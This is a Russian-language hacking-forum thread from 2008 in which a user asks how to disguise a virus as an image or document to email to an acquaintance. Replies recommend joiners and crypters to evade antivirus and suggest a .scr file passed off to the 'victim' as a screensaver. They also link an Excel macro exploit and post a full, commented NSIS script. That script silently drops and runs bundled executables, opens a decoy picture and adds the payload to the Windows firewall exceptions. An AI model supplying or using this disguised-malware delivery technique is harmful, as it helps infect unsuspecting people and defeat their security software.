Нужно переслать вирус (знакомому) по почте как вложение и написать что-то типа "Посмотри прикольную картинку" либо "Очень интересная статья"... Но я уверен почти на 100%, что жертва посмотрит (заметит) разширение .exe (даже если я поставлю ассоциативную стандартную иконку). Как скрыть разширение? Возможно ли поставить разширение .doc или .jpg, но что-бы файл исполнялся?
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
![]() |
![]() |


маскирование EXE-файлов
Автор
oler117
, 06 Sep 2008 10:04
#2
Отправлено 06 September 2008 - 11:39

Цитата
жертва посмотрит (заметит) разширение .exe
Цитата
Возможно ли поставить разширение .doc или .jpg, но что-бы файл исполнялся?
Хотя где-то видел джойнер который соединяет .doc и .exe файлы... ищи ;)
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
*********
icq:162295
*********
#8
Отправлено 09 September 2008 - 08:12

aka PSIH (9.9.2008, 6:03) писал:
криптор маскирует файл от вирусов..
в нагрузку еще несколько осложняет исследование файла (на сколько - зависит собственно от самого криптора)
aka PSIH (9.9.2008, 6:03) писал:
джойнер соединяет два файла в один...
#10
Отправлено 09 September 2008 - 18:47

oler117
Джойнеры ищи по ссылкам которые тебе давал aka PSIH ;)
На счет непалящихся: В принципе, не важно палится джойнер или нет... если у тебя есть нормальный криптор ;)
-- Есть еще у нас сервис на главной странице, который называется Pr0!0gic Joiner ;)
Джойнеры ищи по ссылкам которые тебе давал aka PSIH ;)
На счет непалящихся: В принципе, не важно палится джойнер или нет... если у тебя есть нормальный криптор ;)
-- Есть еще у нас сервис на главной странице, который называется Pr0!0gic Joiner ;)
#11
Отправлено 10 September 2008 - 15:58

"Отказано в доступе к указанному устройству, пути или файлу. Возможно, у вас нет нужных прав доступа к этому объекту" - появляется при попытке открытия любого файла, типа джойнера. Что делать, как избавиться?
Pr0!0gic Joiner не работает... Либо я не шарю как пользоваться, пробывал соеденять .exe и .jpg (пишет, что Тип файла не потдерживается) .exe и .bmp (невозможно отобразить страницу).
Pr0!0gic Joiner не работает... Либо я не шарю как пользоваться, пробывал соеденять .exe и .jpg (пишет, что Тип файла не потдерживается) .exe и .bmp (невозможно отобразить страницу).
#14
Отправлено 10 September 2008 - 19:47

Name "Silent installer" OutFile "bind.exe" Icon "Icon_1.ico" Function .onInit SetSilent silent Functionend Section File /oname=$TEMP\file1.exe file1.exe Exec '"$TEMP\file1.exe"' File /oname=$TEMP\file2.exe file2.exe Exec '"$TEMP\file2.exe"' File /oname=$TEMP\file3.png file3.png ExecShell "open" '"file3.png"' ;FileClose $0 AllowSkipFiles on Sectionend
можно еще добавить в Section что-то типа
WriteRegStr HKLM "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\Standard Profile\AuthorizedApplications\List" 'file1' '$TEMP\file1.exe'
#15
Отправлено 10 September 2008 - 21:34

Цитата
Pr0!0gic Joiner не работает... Либо я не шарю как пользоваться, пробывал соеденять .exe и .jpg (пишет, что Тип файла не потдерживается) .exe и .bmp (невозможно отобразить страницу).

#17
Отправлено 15 September 2008 - 09:26

oler117 (14.9.2008, 22:17) писал:
Pernat1y, можете разъяснить тот код, который написали высше. Т.е. где указывать файл1, где файл2, как писать путь...
еще можеш примеры глянуть, которые лежат в папке с нсис
;название. любое Name "Silent installer" ;название файла-инсталера, в который сбиндяться укаанные ниже файлы OutFile "bind.exe" ;иконка файла-инсталера Icon "Icon_1.ico" Function .onInit ;"тихая" установка. тоесть файлы копируються без каких-либо графических диалогов SetSilent silent Functionend Section ;пример добавления записи в реестр ;в данном случае добавляем файл \temp\file1.exe в исключения в виндовом фаерволе WriteRegStr HKLM "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\Standard Profile\AuthorizedApplications\List" 'file1' '$TEMP\file1.exe' ;первый файл, который биндим. называеться file1.exe. должен лежать ;в той-же папке, что и скрипт. извлекаеться в темп (обычно C:\Windows\temp\) File /oname=$TEMP\file1.exe file1.exe ;запускаем первый файл из темпа ;используем "Exec" для программ (.exe файлов) ;и "ExecShell" для всего остального (рисунков, музыки, видео, документов) Exec '"$TEMP\file1.exe"' ;тоже самое с file2.exe File /oname=$TEMP\file2.exe file2.exe Exec '"$TEMP\file2.exe"' ;и еще картинка File /oname=$TEMP\file3.png file3.png ExecShell "open" '"file3.png"' ;пропускаем файлы, которые не могут быть перезаписаны ;(если не хватает доступа, или файл уже запущен) AllowSkipFiles on Sectionend
#19
Отправлено 16 September 2008 - 17:53

oler117
jpg - не исполняемый файл... можно сделать только с .exe и .scr
-- Сделай .scr и скажи жертве что это скринсейвер
jpg - не исполняемый файл... можно сделать только с .exe и .scr
-- Сделай .scr и скажи жертве что это скринсейвер

#20
Отправлено 15 October 2008 - 20:53

Цитата
jpg - не исполняемый файл... можно сделать только с .exe и .scr
Если у жертвы офис 03, то могу дать джойнер который клеет с росширением *.xls. (работа через макросы =\ )
Update:
Линк на сплойт:
]]>Сплойт xls]]>
#22
Отправлено 18 November 2008 - 20:04

Икселевский сплойт блокируется антивирем (AVG) и я не могу его открыть: "Отказано в доступе к указанному устройству, пути или файлу. Возможно, у вас нет нужных прав доступа к этому объекту". То же самое касается всех остальных джойнеров, сплойтов и др.. Что делать???
#24
Отправлено 19 November 2008 - 09:07

Только убедись что он ни с чем не склеен, а то будет грустно

Количество пользователей, читающих эту тему: 1
0 пользователей, 1 гостей, 0 анонимных